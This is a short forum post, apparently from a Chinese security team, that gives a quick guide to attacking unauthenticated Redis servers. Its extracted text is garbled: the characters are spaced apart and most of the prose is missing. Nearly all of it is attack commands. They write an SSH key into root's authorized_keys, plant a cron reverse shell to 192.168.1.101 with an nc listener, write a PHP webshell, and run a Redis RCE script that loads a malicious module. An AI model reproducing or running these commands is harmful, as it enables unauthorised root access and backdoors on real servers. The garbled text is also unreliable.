[1098] 2020-05-24_一分钟可以看完的Redis漏洞攻击

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-16
2020-05-24_一分钟可以看完的Redis漏洞攻击 R e d i s s y s t 1 m   C h a B u g   2 0 2 0 - 0 5 - 2 4 r e d i s  
s s h - k e y g e n   k e y . t x t   1 .   s s h - k e y g e n   t   r s a 1 .   ( e c h o   - e   " n n " ;   c a t   i d _ r s a . p u b ;   e c h o   - e   " n n " )   >   t e s t . t x t
  R e d i s   s h e l l 1 .   c a t   t e s t . t x t   |   r e d i s - c l i   - h   1 9 2 . 1 6 8 . 1 . 1 0 3   - x   s e t   c r a c k i t 2 .   r e d i s - c l i   - h   1 9 2 . 1 6 8 . 1 . 1 0 3 3 .   c o n f i g   s e t   d i r   / r o o t / . s s h / 4 .   c o n f i g   g e t   d i r 5 .   c o n f i g   s e t   d b f i l e n a m e   " a u t h o r i z e d _ k e y s " 6 .   s a v e 1 .   s s h   - i   i d _ r s a   r o o t @ 1 9 2 . 1 6 8 . 1 . 1 0 3
s h e l l s h e l l 1 .   n c   - l v v p   6 6 6 6 1 .   s e t   x   " n n * / 1   *   *   *   *   / b i n / b a s h   - i   > &   / d e v / t c p / 1 9 2 . 1 6 8 . 1 . 1 0 1 / 6 6 6 6   0 > & 1 n n " 2 .   c o n f i g   s e t   d i r   / v a r / s p o o l / c r o n / 3 .   c o n f i g   s e t   d b f i l e n a m e   r o o t 4 .   s a v e
W E B w e b s h e l l s h e l l 1 .   c o n f i g   s e t   d i r   / v a r / w w w / h t m l / 2 .   c o n f i g   s e t   d b f i l e n a m e   s h e l l . p h p 3 .   s e t   x   " < ? p h p   p h p i n f o ( ) ; ? > " 4 .   s a v e
R C E 1 .   R e d i s   4 . x / 5 . x
1 .   h t t p s : / / g i t h u b . c o m / j a s 5 0 2 n / R e d i s - R C E . g i t 1 .   p y t h o n   r e d i s - r c e . p y   - r   1 9 2 . 1 6 8 . 1 . 1 0 3   - p   6 3 7 9   - L   1 9 2 . 1 6 8 . 1 . 1 0 1   - f   e x p _ l i n . s o
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则